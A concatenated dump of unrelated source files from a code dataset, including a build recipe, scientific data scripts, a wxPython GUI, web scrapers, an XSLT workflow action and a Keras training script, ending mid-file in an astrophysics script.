api.step('gn', ['gn', 'gen', 'out/Release',\n '--args=use_goma=true goma_dir=%s' % api.goma.goma_dir])\n\n command = list(api.properties.get('build_command'))\n env = {}\n allow_build_without_goma = api.properties.get(\n 'allow_build_without_goma', False)\n\n with api.goma.build_with_goma(\n ninja_log_outdir=api.properties.get('ninja_log_outdir'),\n ninja_log_compiler=api.properties.get('ninja_log_compiler'),\n ninja_log_command=command,\n allow_build_without_goma=allow_build_without_goma,\n env=env):\n if 'GOMA_DISABLED' in env:\n api.goma.remove_j_flag(command)\n api.step('ninja', command, env=env)\n else:\n # build something using goma.\n api.step('echo goma jobs',\n ['echo', str(api.goma.recommended_goma_jobs)])\n api.step('echo goma jobs second',\n ['echo', str(api.goma.recommended_goma_jobs)])\n api.step('ninja', command, env=env)\n\ndef GenTests(api):\n for platform in ('linux', 'win', 'mac'):\n properties = {\n 'buildername': 'test_builder',\n 'mastername': 'test_master',\n 'slavename': 'test_slave',\n 'clobber': '1',\n 'build_command': ['ninja', '-C', 'out/Release', '-j', '500'],\n 'ninja_log_outdir': 'out/Release',\n 'ninja_log_compiler': 'goma',\n 'build_data_dir': 'build_data_dir',\n }\n\n yield (api.test(platform) + api.platform.name(platform) +\n api.properties.generic(**properties))\n\n yield (api.test('%s_goma_disabled' % platform) +\n api.step_data('start_goma', retcode=1) +\n api.platform.name(platform) +\n api.properties(allow_build_without_goma=True) +\n api.properties.generic(**properties))\n","sub_path":"scripts/slave/recipe_modules/goma/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78865068","text":"#!/usr/bin/env python\n\n# The USRP process saves raw binary files. The process.py program\n# processes them and yields a numpy array file. This program takes \n# many numpy array files from a single day and packs them into a single\n# hdf5 file.\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport h5py\nimport glob\n\nflist = glob.glob(\"/home/alex/sounder/20131126/rx_*.npy\")\nflist = np.sort(flist)\nfilename = \"soundings_20131126.h5\"\noutfile = h5py.File(filename, 'w')\nfor f in flist:\n\tdata = np.load(f)\n\tdata = 10*np.log10(data[:,0])\n\ttemp = f.split('_')[1]\n\ttime = temp.split('.')[0]\n\tfreq = \"4495\"\n\trecordname = time + '_' + freq\n\toutfile[recordname] = data\n\trecord = outfile[recordname]\n\trecord.attrs['Units'] = 'dB'\n\trecord.attrs['Time'] = time\n\trecord.attrs['Frequency (kHz)'] = freq\n\trecord.attrs['P_Code'] = 'Barker_13'\n\trecord.attrs['N_Pulses'] = 8192\n\trecord.attrs['PRF (Hz)'] = 400\n\trecord.attrs['N_Ranges'] = np.size(data)\noutfile.close()\n","sub_path":"process/h5pack.py","file_name":"h5pack.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271520783","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/coils/logic/workflow/actions/xml/transform.py\n# Compiled at: 2012-10-12 07:02:39\nimport os, base64\nfrom lxml import etree\nfrom coils.core import *\nfrom coils.core.logic import ActionCommand\nfrom extentions import OIEXSLTExtensionPoints\nfrom coils.logic.workflow import XSLTDocument\n\nclass TransformAction(ActionCommand):\n __domain__ = 'action'\n __operation__ = 'transform'\n __aliases__ = ['transformAction']\n\n def __init__(self):\n ActionCommand.__init__(self)\n\n @property\n def result_mimetype(self):\n return self._output_mimetype\n\n def do_action(self):\n oie_extentions = OIEXSLTExtensionPoints(context=self._ctx, process=self.process, scope=self.scope_stack, ctxids=self._ctx_ids)\n extensions = etree.Extension(oie_extentions, ('sequencereset', 'sequencevalue',\n 'sequenceincrement', 'messagetext',\n 'searchforobjectid', 'tablelookup',\n 'reformatdate', 'datetimetodate',\n 'stringtodate', 'stringtodate',\n 'xattrvalue', 'countobjects',\n 'getpid', 'month', 'year',\n 'monthstart', 'monthend', 'today',\n 'yesterday', 'tomorrow', 'dateplusdays',\n 'days', 'weekdays', 'replace'), ns='http://www.opengroupware.us/oie')\n source = etree.parse(self.rfile)\n self.log.debug(('Template is {0}b').format(len(self._xslt)))\n xslt = etree.XSLT(etree.XML(self._xslt), extensions=extensions)\n self.wfile.write(unicode(xslt(source)))\n oie_extentions.shutdown()\n\n def parse_action_parameters(self):\n self._b64 = self.action_parameters.get('isBase64', 'NO').upper()\n xslt_string = self.action_parameters.get('xslt', None)\n xslt_name = self.action_parameters.get('template', None)\n if xslt_string:\n if self._b64 == 'YES':\n self.log_message('Base64 encoded inline template', category='debug')\n self._xslt = base64.decodestring(xslt_string.strip())\n else:\n self.log_message('Native inline template', category='debug')\n self._xslt = self.decode_text(xslt_string)\n elif xslt_name:\n self.log_message(('Loading XSLT template named \"{0}\"').format(xslt_name), category='debug')\n stylesheet = XSLTDocument(xslt_name)\n if stylesheet:\n handle = stylesheet.read_handle\n if handle:\n self._xslt = handle.read()\n BLOBManager.Close(handle)\n else:\n raise CoilsException(('Unable to open XSLT stylesheet \"{0}\" for reading').format(xslt_name))\n stylesheet.close()\n else:\n raise CoilsException(('XSLT Stylesheet \"{0}\" not found.').format(xslt_name))\n else:\n raise CoilsException('No XSLT provided for transform')\n self.log_message(('Template size is {0}b').format(len(self._xslt)), category='debug')\n ctx_param = self.action_parameters.get('contextIds', None)\n if ctx_param:\n ctx_param = self.process_label_substitutions(ctx_param)\n self._ctx_ids = [ int(x) for x in ctx_param.split(',') if x in self._ctx.context_ids ]\n else:\n self._ctx_ids = self._ctx.context_ids\n self._output_mimetype = self.action_parameters.get('mimetype', 'application/xml')\n return\n\n def do_epilogue(self):\n pass","sub_path":"pycfiles/OpenGroupware-0.1.48-py2.6/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271475305","text":"from __future__ import division, print_function\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef f(x,a,b):\n return a*x**2+b*x**3\n\ndef create_noisy_y(f, x, args):\n y = np.random.normal(f(x,*args), 0.1)\n # print(y)\n return y\n\ndef evaluate_L(y,f,x,args):\n L = sum(abs(y-f(x,*args)))\n return L\n\nx = np.array(range(1,11))\na = 1\nb = 4\nargs = [a,b]\n\nL = []\n\nfor i in range(1000):\n y = create_noisy_y(f, x, args)\n # plt.plot(x, f(x,*args), '.', label='true')\n # plt.plot(x, y, '.', label='noisy')\n # plt.semilogy()\n # plt.legend()\n\n L.append(evaluate_L(y,f,x,args))\n # print(L)\n\nplt.hist(L)","sub_path":"ex-1-1.py","file_name":"ex-1-1.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"441286487","text":"import cv2\nimport numpy as np\n\ndef creat_img():\n img = np.ones([400,400,3],np.float32)\n img[:, :, 0] = img[:, :, 0] * 0\n img[:, :, 1] = img[:, :, 1] * 0\n img[:, :, 2] = img[:, :, 2] * 1\n\n cv2.imshow(\"creating\",img)\n\ncreat_img()\ncv2.waitKey(0)\ncv2.destroyWindow()","sub_path":"code/pycharm project/studying/图像识别/创建图片.py","file_name":"创建图片.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"619291721","text":"import wxversion\n# wxversion.select(\"2.8\")\nimport wx\nimport wx.media\n\nimport itertools as IT\nimport os\n\nIMAGE_DIR = os.path.expanduser('H:\\ieee//all_functions\\linux server\\python GUI\\Grid_on_photo/images')\nSOUND_DIR = os.path.expanduser('H:\\ieee//all_functions\\linux server\\python GUI\\Grid_on_photo/sounds')\n\n\nclass MainWindow(wx.Frame):\n\n title = \"Main Menu\"\n\n def __init__(self, parent, id):\n wx.Frame.__init__(self, parent, id, 'Window', size=(1000, 700))\n panel = wx.Panel(self, -1)\n self.SetBackgroundColour(wx.Colour(100, 100, 100))\n self.Centre()\n self.Show()\n\n status = self.CreateStatusBar()\n\n menubar = wx.MenuBar()\n filemenu = wx.Menu()\n exitmenu = filemenu.Append(wx.NewId(), \"Exit\", \"Exit Program\")\n\n menubar.Append(filemenu, \"File\")\n self.Bind(wx.EVT_MENU, self.onExit, exitmenu)\n self.SetMenuBar(menubar)\n\n font1 = wx.Font(\n 30, wx.MODERN, wx.NORMAL, wx.NORMAL, False, u'Consolas')\n\n Text1 = wx.StaticText(panel, -1, \"Rhythm Trainer\", (10, 15))\n Text1.SetFont(font1)\n Text1.SetForegroundColour('white')\n\n btn1 = wx.Button(panel, label='Basic', pos=(100, 200), size=(150, 50))\n btn1.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n\n self.Bind(wx.EVT_BUTTON, self.newwindow, btn1)\n\n btn2 = wx.Button(\n panel, label='Advanced', pos=(100, 270), size=(150, 50))\n btn2.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n\n btn3 = wx.Button(\n panel, label='Notations', pos=(100, 340), size=(150, 50))\n btn3.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n\n btn4 = wx.Button(\n panel, label='Settings', pos=(100, 410), size=(150, 50))\n btn4.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n\n btn5 = wx.Button(panel, label=\"Quit\", pos=(820, 550), size=(150, 50))\n btn5.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n self.Bind(wx.EVT_BUTTON, self.OnClick, btn5)\n\n def OnClick(self, event):\n self.Close()\n\n def OnQuitButton(self, event):\n wx.Sleep(1)\n self.Destroy()\n\n def onExit(self, event):\n self.Destroy()\n\n def newwindow(self, event):\n secondWindow = Window2(parent=None, id=-1)\n secondWindow.Show()\n self.Close()\n\n\nclass Window2(wx.Frame):\n\n title = \"new Window\"\n\n def __init__(self, parent, id):\n wx.Frame.__init__(self, parent, id, 'Window2', size=(1000, 700))\n panel = wx.Panel(self, -1)\n\n self.SetBackgroundColour(wx.Colour(100, 100, 100))\n self.Centre()\n self.Show()\n\n status = self.CreateStatusBar()\n\n menubar = wx.MenuBar()\n filemenu = wx.Menu()\n exitmenu = filemenu.Append(wx.NewId(), \"Exit\", \"Exit Program\")\n\n menubar.Append(filemenu, \"File\")\n self.Bind(wx.EVT_MENU, self.onExit, exitmenu)\n self.SetMenuBar(menubar)\n\n font2 = wx.Font(\n 30, wx.MODERN, wx.NORMAL, wx.NORMAL, False, u'Consolas')\n\n Text2 = wx.StaticText(panel, -1, \"Rhythm Trainer\", (10, 15))\n Text2.SetFont(font2)\n Text2.SetForegroundColour('white')\n self.Show(True)\n\n btn1 = wx.Button(panel, label=\"Back\", pos=(820, 550), size=(150, 50))\n btn1.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n self.Bind(wx.EVT_BUTTON, self.OnClick, btn1)\n\n btn2 = wx.Button(panel, label=\"Play\", pos=(820, 100), size=(150, 50))\n btn2.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n self.Bind(wx.EVT_BUTTON, self.onPlaySound, btn2)\n\n btn3 = wx.Button(panel, label=\"Stop\", pos=(820, 150), size=(150, 50))\n btn3.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n self.Bind(wx.EVT_BUTTON, self.onStopSound, btn3)\n\n btn4 = wx.Button(panel, label=\"Next\", pos=(820, 200), size=(150, 50))\n btn4.SetFont(\n wx.Font(14, wx.DEFAULT, wx.NORMAL, wx.NORMAL, 0, u'Consolas'))\n self.Bind(wx.EVT_BUTTON, self.loadImage, btn4)\n self.panel = wx.Panel(self, -1, pos=(50, 50), size=(800, 200))\n\n self.images = IT.cycle(\n [filename for filename in os.listdir(IMAGE_DIR)\n if any(filename.lower().endswith(ext) \n for ext in ('.png', '.jpg', '.jpeg'))])\n self.image_file = next(self.images)\n\n img = wx.EmptyImage(240,240)\n self.imageCtrl = wx.StaticBitmap(self.panel, wx.ID_ANY, \n wx.BitmapFromImage(img), pos=(200, 50))\n\n def loadImage(self, event):\n self.image_file = next(self.images)\n print(self.image_file)\n image_file = os.path.join(IMAGE_DIR, self.image_file)\n img = wx.Image(image_file, wx.BITMAP_TYPE_ANY)\n img = img.Scale(240,240)\n # The idea of using imageCtrl.SetBitmap comes from\n # http://www.blog.pythonlibrary.org/2010/03/26/creating-a-simple-photo-viewer-with-wxpython/\n self.imageCtrl.SetBitmap(wx.BitmapFromImage(img))\n\n def onPlaySound(self, event):\n sound_file, ext = os.path.splitext(self.image_file)\n sound_file = os.path.join(SOUND_DIR, sound_file + '.mp3')\n print(sound_file)\n sound = wx.Sound(sound_file)\n # sound.IsOk(wx.SOUND_ASYNC)\n sound.Play(wx.SOUND_ASYNC)\n\n def onStopSound(self, event):\n wx.Sound.Stop()\n\n def onExit(self, event):\n self.Destroy()\n wx.Sound.Stop()\n\n def OnClick(self, event):\n wx.Sound.Stop()\n self.Close()\n\nif __name__ == '__main__':\n app = wx.PySimpleApp()\n frame = MainWindow(parent=None, id=-1)\n app.MainLoop()","sub_path":"all_functions/linux server/python GUI/Grid_on_photo/bottun_imgae.py","file_name":"bottun_imgae.py","file_ext":"py","file_size_in_byte":5899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"182093128","text":"import re\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.selector import Selector\n\nfrom hermes.items import EbayItem\n\nID_RE = re.compile(r\"http://www.ebay.com/itm/[^/]+/(\\d+)\")\nPRICE_XPATH = r\"//span[@id='prcIsum']/text()\"\nTITLE_XPATH = r\"//h1[@id='itemTitle']/text()\"\n\nclass EbaySpider(CrawlSpider):\n name = \"ebay\"\n allowed_domains = [\"ebay.com\"]\n start_urls = [\"http://deals.ebay.com/tech-deals\"]\n ebay_deals_url = r\"http://deals.ebay.com/[^/]+$\"\n deal_url = r\"http://www.ebay.com/itm/[^/]+/(\\d+)\"\n rules = (\n # actually scrape a deal url\n Rule(SgmlLinkExtractor(allow=(ebay_deals_url, ))),\n\n # follow all other links\n Rule(SgmlLinkExtractor(allow=(deal_url, )), callback=\"parse_page\"),\n )\n\n def parse_page(self, response):\n sel = Selector(response)\n item = EbayItem()\n\n item['url'] = str(response.url)\n title = sel.xpath(TITLE_XPATH).extract()[0].strip()\n item['title'] = title\n item['tags'] = [x.lower() for x in re.split('\\W+', title)]\n item['price'] = sel.xpath(PRICE_XPATH).extract()[0].strip()\n if ID_RE.match(response.url):\n item['id'] = ID_RE.match(response.url).group(1)\n return item\n","sub_path":"hermes/spiders/ebaydeals.py","file_name":"ebaydeals.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602711294","text":"import urllib.request\nimport re\nfrom bs4 import BeautifulSoup\n\ndef main():\n url='https://baike.baidu.com/item/%E7%8C%AA%E5%85%AB%E6%88%92/769'\n response=urllib.request.urlopen(url)\n html=response.read()\n soup=BeautifulSoup(html,'html.parser')\n for each in soup.find_all(href=re.compile('view')):\n print(each.text,'->','.join([\"http://baike.baidu.com\",\\each[\"href\"]])')\n\nif __name__ ==\"__main__\":\n main()","sub_path":"web_spider/P_20180709_beautifulSoup.py","file_name":"P_20180709_beautifulSoup.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326409839","text":"#!/usr/bin/env python\n#LDAU = .TRUE.\n#LDAUTYPE = 2 ! Dudarev's Approach\n#LDAUL = 2 -1\n#LDAUU = 4.0 0\n#LDAUJ = 1 0\nimport sys;\nif len(sys.argv) < 4 or len(sys.argv)%2 != 0:\n print(\"Usage: python make_dft+u_incar.py POSCAR ele1 U_for_ele_1 [ele2 U_for_ele_2,...]\");\n exit()\n\nelement_wU = [];\nelement_Us = [];\n\nfor i in range(2,len(sys.argv)):\n if(i%2==0):\n element_wU.append(sys.argv[i]);\n element_Us.append(sys.argv[i+1]);\n\nLDAULline = \"LDAUL = \";\nLDAUUline = \"LDAUU = \";\nLDAUJline = \"LDAUJ = \";\n\ntry:\n poscar = open(sys.argv[1],'r');\n elements = poscar.readline().strip().split();\n for i in elements:\n if i in element_wU:\n pos = element_wU.index(i);\n LDAULline += str(\"2 \");\n LDAUUline += str(element_Us[pos]+\" \");\n else:\n LDAULline += str(\"-1 \");\n LDAUUline += str(\"0.0 \");\n LDAUJline += \"0.0 \";\nexcept IOError:\n print(\"Can't open poscar file \"+sys.argv[1]);\n exit();\n\nprint(\"LDAU = .TRUE.\");\nprint(\"LDAUTYPE = 2 ! Dudarev's Approach\");\nprint(LDAULline);\nprint(LDAUUline);\nprint(LDAUJline);\n","sub_path":"make_dft+u_incar.py","file_name":"make_dft+u_incar.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"43640524","text":"# Author: Hanzi Mao \n#\n# License: BSD 3 clause\n\nfrom . import select_area, get_lat_lon, match_lat_lon\n\nfrom netCDF4 import Dataset\n\n\ndef subset_usa(in_file, lat1, lat2, lon1, lon2, var_lis, out_file):\n fh_in = Dataset(in_file, \"r\")\n fh_out = Dataset(out_file, \"w\")\n\n lat_indices, lon_indices = select_area(lat1, lat2, lon1, lon2, \"M03\")\n lats, lons = get_lat_lon(\"M03\")\n lats = lats[lat_indices[0]: lat_indices[1]]\n lons = lons[lon_indices[0]: lon_indices[1]]\n\n i_lat_start, i_lat_end, i_lon_start, i_lon_end = match_lat_lon(fh_in.variables[\"lat\"][:],\n fh_in.variables[\"lon\"][:],\n lats,\n lons)\n\n fh_out.createDimension('lat', len(lats))\n fh_out.createDimension('lon', len(lons))\n\n outVar = fh_out.createVariable('lat', 'f4', ('lat'))\n outVar.setncatts({\"units\": \"degree_north\"})\n outVar[:] = lats[:]\n outVar = fh_out.createVariable('lon', 'f4', ('lon'))\n outVar.setncatts({\"units\": \"degree_east\"})\n outVar[:] = lons[:]\n\n for v_name, varin in fh_in.variables.items():\n if v_name in var_lis:\n outVar = fh_out.createVariable(v_name, varin.datatype, varin.dimensions)\n outVar.setncatts({k: varin.getncattr(k) for k in varin.ncattrs()})\n outVar[:] = varin[i_lat_start: i_lat_end + 1, i_lon_start: i_lon_end + 1]\n\n fh_out.close()\n\n","sub_path":"data_preprocessing/utils/subset_usa.py","file_name":"subset_usa.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210660315","text":"\n\n#calss header\nclass _VANISH():\n\tdef __init__(self,): \n\t\tself.name = \"VANISH\"\n\t\tself.definitions = [u'to disappear or stop being present or existing, especially in a sudden, surprising way: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'verbs'\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/verbs/_vanish.py","file_name":"_vanish.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"66784534","text":"#!/usr/bin/env python3\n# filename: analyzer_breeder.py\n\nimport os\nimport cv2\nimport data_loader as dl\nimport analyzers_2_categories as a2c\nfrom sklearn.model_selection import KFold\nimport model_evaluation as m_eval\nimport eval_figures as eval_figs\nimport datetime\nimport timer\nimport pickle\n\n\ndef main():\n start_time = datetime.datetime.now()\n\n #############\n # Load Data #\n #############\n\n data_root = '../input-data/'\n #data_category = '1-pre-processed'\n data_category = '2-processed'\n data_base = data_root + data_category + '/'\n # A: 138062 images. Full data set in original file structure.\n #data_path = data_base+'A'\n #data_name = 'data_A'\n #data_short_name = 'A'\n # B: 26 images.\n data_path = data_base+'B'\n data_name = 'data_B'\n data_short_name = 'B'\n # C: 200 images. (Abnormal=Blood)\n #data_path = data_base+'C'\n #data_name = 'data_C'\n #data_short_name = 'C'\n # D: 2000 images.\n #data_path = data_base+'D'\n #data_name = 'data_D'\n #data_short_name = 'D'\n # E: 10000 images.\n #data_path = data_base+'E'\n #data_name = 'data_E'\n #data_short_name = 'E'\n # F: 138062 images. Full data (minus vids) set in modified file structure.\n #data_path = data_base+'F'\n #data_name = 'data_F'\n #data_short_name = 'F'\n\n # Load:\n class_split = 'by_abnorm'\n #class_split = 'by_region'\n train_set, train_files, train_labels, \\\n test_set, test_files \\\n = dl.load_data_2class_abnormality(data_path)\n # = dl.load_data_4class_region(data_path)\n\n\n ####################\n # Find Input Shape #\n ####################\n\n # Take sample image\n img = cv2.imread(train_set.iloc[0][0])\n\n img_height = img.shape[0]\n img_width = img.shape[1]\n img_channels = img.shape[2]\n img_shape = (img_height, img_width, img_channels)\n img_size = (img_height, img_width)\n\n # Any images that do not have this size will be cropped.\n # See source of train_model().\n # (What about if they're too small?)\n\n\n ##################\n # Breed Analyzer #\n ##################\n\n # Initialize model\n model, model_short_name, base_model_name \\\n = a2c.mobilenet_v2_a(img_shape) # without \"fine-tuning\"\n # Options:\n # = a2c.mobilenet_v2_a(img_shape) # without \"fine-tuning\"\n # = a2c.mobilenet_v2_b(img_shape) # with shallow \"fine-tuning\"\n # = a2c.mobilenet_v2_c(img_shape) # with deep \"fine-tuning\"\n # = a2c.mobilenet_v2_d(img_shape) # with deep \"fine-tuning\"\n # = a2c.xception_a(img_shape) # without \"fine-tuning\"\n # = a2c.xception_b(img_shape) # with shallow \"fine-tuning\"\n\n # Output location\n #output_root = '../output/test/train/'\n #output_root = '../output/cpu/train/'\n output_root = '../output/train/'\n output_base = output_root + f'{model_short_name}/' + \\\n f'{data_category}/{class_split}/{data_name}/'\n\n # Prepare for training\n batch_size = 2 # B\n #batch_size = 4 # C\n #batch_size = 20 # D (mobilenet)\n #batch_size = 10 # D (xception) #Got error (fixed by reducing to 10)\n #batch_size = 10 #E (mobilenet) #Got error at 40, reducing to 10\n #batch_size = 100 # F\n epochs = 50\n n_fold = 4 # B,C (MNv2d E, D run 2+; MNv2a E run 2+)\n #n_fold = 5 # D,E,F\n histories = []\n\n # Find this run's number (\"train-and-test run #..\")\n run = 1\n while os.path.isfile(output_base +\n f'Run_{run:02d}/duration_total_breeder.txt'):\n run += 1\n run_path = output_base + f'Run_{run:02d}/'\n\n os.makedirs(run_path, exist_ok=True)\n file = open(run_path+f'train_params.txt', 'w')\n file.write(f'batch_size = {batch_size}\\n' +\n f'epochs = {epochs}\\n' +\n f'n_fold = {n_fold}\\n')\n file.close()\n\n kf = KFold(n_splits=n_fold, shuffle=True)\n\n # Train model: compile (configure for training), train, test, save (& time)\n tnt_start_time = datetime.datetime.now()\n histories, test_pred = a2c.train_model(model, batch_size, epochs, img_size,\n train_set, train_labels, test_files,\n n_fold, kf, run_path, run)\n tnt_end_time = datetime.datetime.now()\n\n print('Now recording train-and-test durations.')\n # Total:\n description = 'Run train-and-test time (duration)'\n filepath1 = run_path + f'duration_train_and_test.txt'\n tnt_elapsed = tnt_end_time - tnt_start_time\n tnt_tot_sec = timer.record_duration(tnt_elapsed, description, filepath1)\n # Per image:\n description = 'Run train-and-test time (average duration per image)'\n filepath2 = run_path + f'duration_train_and_test_per_img.txt'\n tot_num_imgs = len(train_set) + len(test_set)\n tnt_elapsed_per_img = tnt_tot_sec / tot_num_imgs\n tnt_imgs_per_sec = tot_num_imgs / tnt_tot_sec\n file = open(filepath2, 'w')\n file.write(f'{description}\\n = ' +\n f'({tnt_tot_sec} seconds) / ({tot_num_imgs} images)\\n = ' +\n f'{tnt_elapsed_per_img} seconds/image.' +\n f'\\n\\n' +\n f'({tot_num_imgs} images) / ({tnt_tot_sec} seconds)\\n = ' +\n f'{tnt_imgs_per_sec} images/second.\\n')\n file.close()\n\n\n #############################\n # Save/Generate More Output #\n #############################\n\n print('Now saving training output and histories.')\n run_results_path = run_path + f'results/'\n os.makedirs(run_results_path, exist_ok=True)\n # output:\n test_set['abnormality_pred'] = test_pred\n run_results_file_path = run_results_path + \\\n f'output_scores.csv'\n test_set.to_csv(run_results_file_path, index=None)\n # histories:\n run_histories_path = run_path + f'histories/'\n run_histories_file_path = run_histories_path + \\\n f'histories_Run_{run:02d}.pckl'\n os.makedirs(run_histories_path, exist_ok=True)\n f = open(run_histories_file_path, 'wb')\n pickle.dump(histories, f)\n f.close()\n\n print('Now generating and saving evaluations and figures.')\n eval_path = run_path + f'evaluations/'\n eval_fig_path = eval_path + f'figures/'\n os.makedirs(eval_fig_path, exist_ok=True)\n # histories\n plot_run_name = model_short_name + data_short_name + 'r' + str(run)\n eval_figs.make_acc_loss_plots(histories, eval_fig_path, plot_run_name)\n # ROC fig\n eval_figs.make_roc_plot(test_set, eval_fig_path, plot_run_name)\n # evaluations data\n # (precision/recall, sensitivity/specificity, ROC/thresholds, etc)\n test_w_reckoning_choices, evaluations \\\n = m_eval.make_eval_data(test_set, eval_path, plot_run_name)\n # thresh, CM fig, and reckonings\n eval_figs.pick_thresh_make_figures(evaluations, test_w_reckoning_choices,\n eval_path, eval_fig_path, plot_run_name)\n # (could show points on ROC curve for chosen threshold(s))\n\n print('Now recording total breeder duration.')\n end_time = datetime.datetime.now()\n elapsed = end_time - start_time\n description = 'Total breeder (train-test-evaluate-etc) time (duration)'\n filepath3 = run_path + f'duration_total_breeder.txt'\n timer.record_duration(elapsed, description, filepath3)\n\n\nif __name__ == '__main__':\n main()\n\n","sub_path":"ai_vision_for_endoscopy/analyzer_breeder.py","file_name":"analyzer_breeder.py","file_ext":"py","file_size_in_byte":7308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"648572735","text":"# -*- coding=UTF-8 -*-\n# pyright: strict, reportTypeCommentUsage=none\n\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nTYPE_CHECKING = False\nif TYPE_CHECKING:\n from typing import Any, Text, Optional, Callable, TypeVar, ParamSpec\n\n T = TypeVar(\"T\")\n P = ParamSpec(\"P\")\n\nfrom threading import Thread\nfrom functools import wraps\n\n\ndef run_in_thread(\n name=None,\n daemon=None,\n):\n # type: (Optional[Text], Optional[bool]) -> Callable[[Callable[P, T]], Callable[P, Thread]]\n \"\"\"Run func in thread.\"\"\"\n\n def outer(f):\n # type: (Callable[P, T]) -> Callable[P, Thread]\n\n @wraps(f)\n def inner(*args, **kwargs):\n # type: (Any, Any) -> Thread\n thread = Thread(\n target=f,\n name=name,\n args=args,\n kwargs=kwargs,\n )\n if daemon:\n thread.daemon = True\n thread.start()\n return thread\n\n return inner # type: ignore\n\n return outer\n","sub_path":"wulifang/_util/_run_in_thread.py","file_name":"_run_in_thread.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"96813307","text":"import sys\nimport os\nimport random\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc, rcParams\nfrom matplotlib.ticker import MultipleLocator, FormatStrFormatter\nimport numpy as np\nfrom math import *\nfrom time import time\nimport random\nfrom astropy.io import ascii\nfrom astropy.table import Table, Column \nfrom scipy import interpolate\n\n\n\n\ndef myM2L_(L_k, alfa):\n \n \n L = L_k / 1.E10\n if L>=1: \n return 32.*(L**0.15)\n else:\n return 32.*(L**alfa)\n \ndef myM2L__(alfa):\n \n L_lst = [1.E13, 4.423E10, 9E8, 1.E7]\n M2L_lst = [myM2L_(1.E13, alfa), myM2L_(4.423E10, alfa), myM2L_(9E8, alfa), myM2L_(1.E7, alfa)]\n \n L_lst = np.asarray(L_lst)\n M2L_lst = np.asarray(M2L_lst)\n \n myM2L = interpolate.interp1d(np.log10(L_lst), np.log10(M2L_lst))\n \n return myM2L \n\n\n\ndef L_exp(M, alfa, beta, gama):\n \n M12 = M/1.E12\n \n log10L = log10(alfa) + 10. + beta*log10(M12) + (gama/M12)*log10(exp(1.))\n \n return 10**log10L\n\n\ndef M_exp_f(alfa, beta, gama):\n \n Lbin = np.logspace(7,13,1000)\n Mbin = np.logspace(10,20,1000) \n \n for i in range(len(Mbin)): Lbin[i] = L_exp(Mbin[i], alfa, beta, gama)\n \n M_f = interpolate.interp1d(np.log10(Lbin), np.log10(Mbin))\n \n return M_f\n\n\n#################################################################\n\nif __name__ == '__main__':\n \n fig = plt.figure(figsize=(45/7., 6), dpi=100)\n #ax = fig.add_axes([0.13, 0.1, 0.83, 0.85]) # m-L relation\n ax = fig.add_axes([0.15, 0.13, 0.80, 0.80]) \n \n \n Lbin = np.logspace(7,13,50)\n Mbin = np.logspace(10,15,50)\n \n f = myM2L__(-0.9393)\n for i in range(len(Lbin)): Mbin[i] = 10**f(np.log10(Lbin[i]))*Lbin[i]\n ax.plot(Mbin,Lbin, 'b.') \n \n \n f = myM2L__(-0.5)\n for i in range(len(Lbin)): Mbin[i] = 10**f(np.log10(Lbin[i]))*Lbin[i]\n ax.plot(Mbin,Lbin, 'r-') \n \n \n #alfa = 3.7043 \n #beta = 0.8827 \n #gama = -0.4347\n alfa = 4.0 \n beta = 0.82 \n gama = 